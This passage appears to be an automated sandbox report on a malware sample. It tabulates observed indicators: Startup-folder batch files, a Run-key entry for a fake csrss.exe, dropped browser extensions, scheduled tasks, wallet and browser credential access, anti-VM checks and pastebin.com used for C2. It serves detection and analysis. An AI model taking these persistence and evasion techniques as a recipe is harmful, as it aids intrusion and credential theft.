| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QzEYoAWx4smjRu1kZKqmayrp.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lmh2KmV2PnvgDuj8Qe9u335v.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t05whX2SIYE8oQqG8v96EfkB.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\78orv5C8hDfSdiFoTzVFxemj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ea41sbCuHfyirBCvzFZ4JQZW.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Kzs6FglmbP4kUg9GHssTg5I.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJ3wYiLxvfbSPc6hk9fHkViy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzmgzDQiucq87nB3zKcki3TK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\05xsiZf5NWRDpjyI705Ae2F6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11HR7BA0lP5cYmruMGs6N6F7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jqBiZZSu8iVMb3snbvzQSdzy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4932 set thread context of 576 | N/A | C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
| PID 3156 set thread context of 3208 | N/A | C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\lwnFiLS.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\LCifMpYymZWU2\LjcpulfHaxToA.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\mVqQIGUXDOgrC\ASJceUC.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\yvWovCiVU\jplHxo.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
| File created | C:\Program Files (x86)\gbPxNkbXHfUn\qQKFSEI.dll | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\FTXCzbcEvROqagNdd.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe | N/A |
| File created | C:\Windows\Tasks\eGwAoTnpAObQfPU.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe | N/A |
| File opened for modification | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
